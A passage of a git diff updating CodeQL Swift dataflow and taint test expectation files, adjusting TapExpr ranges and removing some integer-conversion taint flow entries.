stringinterpolation.swift:32:12:32:12 | TapExpr | +| stringinterpolation.swift:32:24:32:24 | &... | stringinterpolation.swift:32:12:32:24 | TapExpr | | stringinterpolation.swift:32:24:32:24 | [post] $interpolation | stringinterpolation.swift:32:24:32:24 | &... | | stringinterpolation.swift:36:6:36:6 | SSA def(a) | stringinterpolation.swift:40:15:40:15 | a | | stringinterpolation.swift:36:6:36:6 | a | stringinterpolation.swift:36:6:36:6 | SSA def(a) | @@ -623,7 +607,7 @@ | stringinterpolation.swift:38:10:38:16 | call to clean() | stringinterpolation.swift:38:6:38:6 | c | | stringinterpolation.swift:40:12:40:12 | | stringinterpolation.swift:40:13:40:13 | [post] $interpolation | | stringinterpolation.swift:40:12:40:12 | SSA def($interpolation) | stringinterpolation.swift:40:13:40:13 | $interpolation | -| stringinterpolation.swift:40:12:40:12 | TapExpr | stringinterpolation.swift:40:12:40:12 | "..." | +| stringinterpolation.swift:40:12:40:26 | TapExpr | stringinterpolation.swift:40:12:40:12 | "..." | | stringinterpolation.swift:40:13:40:13 | $interpolation | stringinterpolation.swift:40:13:40:13 | &... | | stringinterpolation.swift:40:13:40:13 | $interpolation | stringinterpolation.swift:40:13:40:13 | [post] $interpolation | | stringinterpolation.swift:40:13:40:13 | &... | stringinterpolation.swift:40:14:40:14 | $interpolation | @@ -650,11 +634,11 @@ | stringinterpolation.swift:40:26:40:26 | | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | | stringinterpolation.swift:40:26:40:26 | $interpolation | stringinterpolation.swift:40:26:40:26 | &... | | stringinterpolation.swift:40:26:40:26 | $interpolation | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | -| stringinterpolation.swift:40:26:40:26 | &... | stringinterpolation.swift:40:12:40:12 | TapExpr | +| stringinterpolation.swift:40:26:40:26 | &... | stringinterpolation.swift:40:12:40:26 | TapExpr | | stringinterpolation.swift:40:26:40:26 | [post] $interpolation | stringinterpolation.swift:40:26:40:26 | &... | | stringinterpolation.swift:41:12:41:12 | | stringinterpolation.swift:41:13:41:13 | [post] $interpolation | | stringinterpolation.swift:41:12:41:12 | SSA def($interpolation) | stringinterpolation.swift:41:13:41:13 | $interpolation | -| stringinterpolation.swift:41:12:41:12 | TapExpr | stringinterpolation.swift:41:12:41:12 | "..." | +| stringinterpolation.swift:41:12:41:26 | TapExpr | stringinterpolation.swift:41:12:41:12 | "..." | | stringinterpolation.swift:41:13:41:13 | $interpolation | stringinterpolation.swift:41:13:41:13 | &... | | stringinterpolation.swift:41:13:41:13 | $interpolation | stringinterpolation.swift:41:13:41:13 | [post] $interpolation | | stringinterpolation.swift:41:13:41:13 | &... | stringinterpolation.swift:41:14:41:14 | $interpolation | @@ -681,11 +665,11 @@ | stringinterpolation.swift:41:26:41:26 | | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | | stringinterpolation.swift:41:26:41:26 | $interpolation | stringinterpolation.swift:41:26:41:26 | &... | | stringinterpolation.swift:41:26:41:26 | $interpolation | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | -| stringinterpolation.swift:41:26:41:26 | &... | stringinterpolation.swift:41:12:41:12 | TapExpr | +| stringinterpolation.swift:41:26:41:26 | &... | stringinterpolation.swift:41:12:41:26 | TapExpr | | stringinterpolation.swift:41:26:41:26 | [post] $interpolation | stringinterpolation.swift:41:26:41:26 | &... | | stringinterpolation.swift:42:12:42:12 | | stringinterpolation.swift:42:13:42:13 | [post] $interpolation | | stringinterpolation.swift:42:12:42:12 | SSA def($interpolation) | stringinterpolation.swift:42:13:42:13 | $interpolation | -| stringinterpolation.swift:42:12:42:12 | TapExpr | stringinterpolation.swift:42:12:42:12 | "..." | +| stringinterpolation.swift:42:12:42:26 | TapExpr | stringinterpolation.swift:42:12:42:12 | "..." | | stringinterpolation.swift:42:13:42:13 | $interpolation | stringinterpolation.swift:42:13:42:13 | &... | | stringinterpolation.swift:42:13:42:13 | $interpolation | stringinterpolation.swift:42:13:42:13 | [post] $interpolation | | stringinterpolation.swift:42:13:42:13 | &... | stringinterpolation.swift:42:14:42:14 | $interpolation | @@ -710,11 +694,11 @@ | stringinterpolation.swift:42:26:42:26 | | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | | stringinterpolation.swift:42:26:42:26 | $interpolation | stringinterpolation.swift:42:26:42:26 | &... | | stringinterpolation.swift:42:26:42:26 | $interpolation | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | -| stringinterpolation.swift:42:26:42:26 | &... | stringinterpolation.swift:42:12:42:12 | TapExpr | +| stringinterpolation.swift:42:26:42:26 | &... | stringinterpolation.swift:42:12:42:26 | TapExpr | | stringinterpolation.swift:42:26:42:26 | [post] $interpolation | stringinterpolation.swift:42:26:42:26 | &... | | stringinterpolation.swift:43:12:43:12 | | stringinterpolation.swift:43:13:43:13 | [post] $interpolation | | stringinterpolation.swift:43:12:43:12 | SSA def($interpolation) | stringinterpolation.swift:43:13:43:13 | $interpolation | -| stringinterpolation.swift:43:12:43:12 | TapExpr | stringinterpolation.swift:43:12:43:12 | "..." | +| stringinterpolation.swift:43:12:43:26 | TapExpr | stringinterpolation.swift:43:12:43:12 | "..." | | stringinterpolation.swift:43:13:43:13 | $interpolation | stringinterpolation.swift:43:13:43:13 | &... | | stringinterpolation.swift:43:13:43:13 | $interpolation | stringinterpolation.swift:43:13:43:13 | [post] $interpolation | | stringinterpolation.swift:43:13:43:13 | &... | stringinterpolation.swift:43:14:43:14 | $interpolation | @@ -739,11 +723,11 @@ | stringinterpolation.swift:43:26:43:26 | | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | | stringinterpolation.swift:43:26:43:26 | $interpolation | stringinterpolation.swift:43:26:43:26 | &... | | stringinterpolation.swift:43:26:43:26 | $interpolation | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | -| stringinterpolation.swift:43:26:43:26 | &... | stringinterpolation.swift:43:12:43:12 | TapExpr | +| stringinterpolation.swift:43:26:43:26 | &... | stringinterpolation.swift:43:12:43:26 | TapExpr | | stringinterpolation.swift:43:26:43:26 | [post] $interpolation | stringinterpolation.swift:43:26:43:26 | &... | | stringinterpolation.swift:44:12:44:12 | | stringinterpolation.swift:44:13:44:13 | [post] $interpolation | | stringinterpolation.swift:44:12:44:12 | SSA def($interpolation) | stringinterpolation.swift:44:13:44:13 | $interpolation | -| stringinterpolation.swift:44:12:44:12 | TapExpr | stringinterpolation.swift:44:12:44:12 | "..." | +| stringinterpolation.swift:44:12:44:26 | TapExpr | stringinterpolation.swift:44:12:44:12 | "..." | | stringinterpolation.swift:44:13:44:13 | $interpolation | stringinterpolation.swift:44:13:44:13 | &... | | stringinterpolation.swift:44:13:44:13 | $interpolation | stringinterpolation.swift:44:13:44:13 | [post] $interpolation | | stringinterpolation.swift:44:13:44:13 | &... | stringinterpolation.swift:44:14:44:14 | $interpolation | @@ -768,7 +752,7 @@ | stringinterpolation.swift:44:26:44:26 | | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | | stringinterpolation.swift:44:26:44:26 | $interpolation | stringinterpolation.swift:44:26:44:26 | &... | | stringinterpolation.swift:44:26:44:26 | $interpolation | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | -| stringinterpolation.swift:44:26:44:26 | &... | stringinterpolation.swift:44:12:44:12 | TapExpr | +| stringinterpolation.swift:44:26:44:26 | &... | stringinterpolation.swift:44:12:44:26 | TapExpr | | stringinterpolation.swift:44:26:44:26 | [post] $interpolation | stringinterpolation.swift:44:26:44:26 | &... | | subscript.swift:1:7:1:7 | SSA def(self) | subscript.swift:1:7:1:7 | self[return] | | subscript.swift:1:7:1:7 | SSA def(self) | subscript.swift:1:7:1:7 | self[return] | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 70cf2d3eaf0..104e2baa545 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected @@ -1,6 +1,4 @@ edges -| conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | provenance | | -| conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | provenance | | | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | provenance | | | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | provenance | | | conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | provenance | | @@ -24,19 +22,8 @@ edges | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | provenance | | | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:58:12:58:12 | v5 | provenance | | -| conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | provenance | | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:61:12:61:12 | v6 | provenance | | -| conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | provenance | | | conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | provenance | | -| conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | provenance | | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | conversions.swift:71:12:71:37 | ...! | provenance | | -| conversions.swift:71:25:71:35 | call to sourceInt() | conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | provenance | | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | conversions.swift:72:12:72:40 | ...! | provenance | | -| conversions.swift:72:28:72:38 | call to sourceInt() | conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | provenance | | -| conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | provenance | | -| conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | provenance | | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:42 | ...! | provenance | | | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | provenance | | | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | provenance | | @@ -44,7 +31,6 @@ edges | conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | provenance | | | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | provenance | | | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | provenance | | -| conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | provenance | | | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | provenance | | | conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | provenance | | | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | provenance | | @@ -64,8 +50,6 @@ edges | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | provenance | | | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | provenance | | | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | provenance | | -| conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | provenance | | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | provenance | | | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | provenance | | | conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | provenance | | | conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | @@ -82,7 +66,6 @@ edges | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | -| conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | @@ -114,10 +97,6 @@ edges | conversions.swift:200:3:200:3 | [post] self [v] | conversions.swift:199:2:201:2 | self[return] [v] | provenance | | | conversions.swift:200:12:200:12 | v | conversions.swift:200:3:200:3 | [post] self [v] | provenance | | | conversions.swift:205:7:205:17 | withUInt | conversions.swift:206:13:206:13 | withUInt | provenance | | -| conversions.swift:205:7:205:17 | withUInt | conversions.swift:207:14:207:14 | withUInt | provenance | | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:205:2:209:2 | self[return] | provenance | | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:208:12:208:12 | self | provenance | | -| conversions.swift:207:14:207:14 | withUInt | conversions.swift:207:10:207:22 | call to Self.init(_:) | provenance | | | conversions.swift:211:7:211:20 | withMyValue [v] | conversions.swift:212:13:212:13 | withMyValue [v] | provenance | | | conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:212:13:212:25 | .v | provenance | | @@ -136,7 +115,6 @@ edges | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | provenance | | | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | provenance | | @@ -232,10 +210,6 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:33:12:33:27 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:33:16:33:26 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:34:12:34:29 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:34:18:34:28 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:35:12:35:29 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:35:18:35:28 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:36:12:36:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | @@ -268,27 +242,9 @@ nodes | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | | conversions.swift:54:31:54:41 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | -| conversions.swift:57:36:57:46 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:58:12:58:12 | v5 | semmle.label | v5 | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | semmle.label | call to UInt.init(bitPattern:) | -| conversions.swift:60:28:60:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:61:12:61:12 | v6 | semmle.label | v6 | | conversions.swift:63:11:63:26 | call to abs(_:) | semmle.label | call to abs(_:) | | conversions.swift:63:15:63:25 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:69:12:69:39 | call to advanced(by:) | semmle.label | call to advanced(by:) | -| conversions.swift:69:28:69:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | -| conversions.swift:71:12:71:37 | ...! | semmle.label | ...! | -| conversions.swift:71:25:71:35 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | -| conversions.swift:72:12:72:40 | ...! | semmle.label | ...! | -| conversions.swift:72:28:72:38 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:73:12:73:37 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | -| conversions.swift:73:26:73:36 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | -| conversions.swift:74:36:74:46 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | | conversions.swift:75:12:75:42 | ...! | semmle.label | ...! | | conversions.swift:75:16:75:29 | call to sourceString() | semmle.label | call to sourceString() | @@ -303,8 +259,6 @@ nodes | conversions.swift:108:12:108:24 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:109:12:109:31 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:109:18:109:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | -| conversions.swift:110:12:110:31 | call to UInt8.init(_:) | semmle.label | call to UInt8.init(_:) | -| conversions.swift:110:18:110:30 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:111:12:111:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:111:19:111:31 | call to sourceFloat() | semmle.label | call to sourceFloat() | | conversions.swift:112:12:112:32 | call to String.init(_:) | semmle.label | call to String.init(_:) | @@ -340,10 +294,6 @@ nodes | conversions.swift:128:12:128:27 | .exponent | semmle.label | .exponent | | conversions.swift:129:12:129:25 | call to sourceDouble() | semmle.label | call to sourceDouble() | | conversions.swift:129:12:129:27 | .significand | semmle.label | .significand | -| conversions.swift:130:12:130:23 | call to sourceUInt() | semmle.label | call to sourceUInt() | -| conversions.swift:130:12:130:25 | .byteSwapped | semmle.label | .byteSwapped | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | semmle.label | call to sourceUInt64() | -| conversions.swift:131:12:131:27 | .byteSwapped | semmle.label | .byteSwapped | | conversions.swift:135:12:135:25 | call to sourceString() | semmle.label | call to sourceString() | | conversions.swift:136:12:136:33 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:136:19:136:32 | call to sourceString() | semmle.label | call to sourceString() | @@ -361,8 +311,6 @@ nodes | conversions.swift:156:40:156:40 | parent | semmle.label | parent | | conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | | conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | -| conversions.swift:166:12:166:35 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:166:24:166:34 | call to sourceInt() | semmle.label | call to sourceInt() | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | | conversions.swift:172:14:172:26 | [...] [Collection element] | semmle.label | [...] [Collection element] | | conversions.swift:172:15:172:25 | call to sourceInt() | semmle.label | call to sourceInt() | @@ -396,12 +344,8 @@ nodes | conversions.swift:199:7:199:12 | v | semmle.label | v | | conversions.swift:200:3:200:3 | [post] self [v] | semmle.label | [post] self [v] | | conversions.swift:200:12:200:12 | v | semmle.label | v | -| conversions.swift:205:2:209:2 | self[return] | semmle.label | self[return] | | conversions.swift:205:7:205:17 | withUInt | semmle.label | withUInt | | conversions.swift:206:13:206:13 | withUInt | semmle.label | withUInt | -| conversions.swift:207:10:207:22 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| conversions.swift:207:14:207:14 | withUInt | semmle.label | withUInt | -| conversions.swift:208:12:208:12 | self | semmle.label | self | | conversions.swift:211:7:211:20 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:212:13:212:13 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:212:13:212:25 | .v | semmle.label | .v | @@ -417,7 +361,6 @@ nodes | conversions.swift:225:13:225:25 | .v | semmle.label | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | semmle.label | call to Int.init(withUInt:) | | conversions.swift:232:26:232:37 | call to sourceUInt() | semmle.label | call to sourceUInt() | | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | | conversions.swift:235:37:235:47 | call to sourceInt() | semmle.label | call to sourceInt() | @@ -557,7 +500,6 @@ subpaths | conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | conversions.swift:205:2:209:2 | self[return] | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | @@ -572,8 +514,6 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | conversions.swift:32:12:32:22 | call to sourceInt() | result | -| conversions.swift:33:12:33:27 | call to Self.init(_:) | conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | result | -| conversions.swift:34:12:34:29 | call to Self.init(_:) | conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | result | | conversions.swift:35:12:35:29 | call to Float.init(_:) | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | result | | conversions.swift:36:12:36:30 | call to String.init(_:) | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | result | | conversions.swift:37:12:37:32 | .utf8 | conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:32 | .utf8 | result | @@ -586,14 +526,7 @@ subpaths | conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | result | | conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:52:12:52:12 | v2 | result | | conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:58:12:58:12 | v5 | conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:58:12:58:12 | v5 | result | -| conversions.swift:61:12:61:12 | v6 | conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:61:12:61:12 | v6 | result | | conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:69:12:69:39 | call to advanced(by:) | conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | result | -| conversions.swift:71:12:71:37 | ...! | conversions.swift:71:25:71:35 | call to sourceInt() | conversions.swift:71:12:71:37 | ...! | result | -| conversions.swift:72:12:72:40 | ...! | conversions.swift:72:28:72:38 | call to sourceInt() | conversions.swift:72:12:72:40 | ...! | result | -| conversions.swift:73:12:73:37 | call to Self.init(clamping:) | conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | result | -| conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | result | | conversions.swift:75:12:75:42 | ...! | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:42 | ...! | result | | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | result | | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | result | @@ -601,7 +534,6 @@ subpaths | conversions.swift:80:12:80:24 | .bigEndian | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | result | | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | result | | conversions.swift:109:12:109:31 | call to Float.init(_:) | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | result | -| conversions.swift:110:12:110:31 | call to UInt8.init(_:) | conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | result | | conversions.swift:111:12:111:32 | call to String.init(_:) | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | result | | conversions.swift:112:12:112:34 | .utf8 | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:34 | .utf8 | result | | conversions.swift:113:12:113:34 | call to String.init(_:) | conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | result | @@ -618,8 +550,6 @@ subpaths | conversions.swift:127:12:127:28 | .significand | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | result | | conversions.swift:128:12:128:27 | .exponent | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | result | | conversions.swift:129:12:129:27 | .significand | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | result | -| conversions.swift:130:12:130:25 | .byteSwapped | conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | result | -| conversions.swift:131:12:131:27 | .byteSwapped | conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | result | | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | result | | conversions.swift:136:12:136:33 | call to String.init(_:) | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | result | | conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:145:12:145:12 | ms2 | result | @@ -629,7 +559,6 @@ subpaths | conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:154:12:154:12 | parent | result | | conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:157:12:157:12 | v3 | result | | conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:44 | 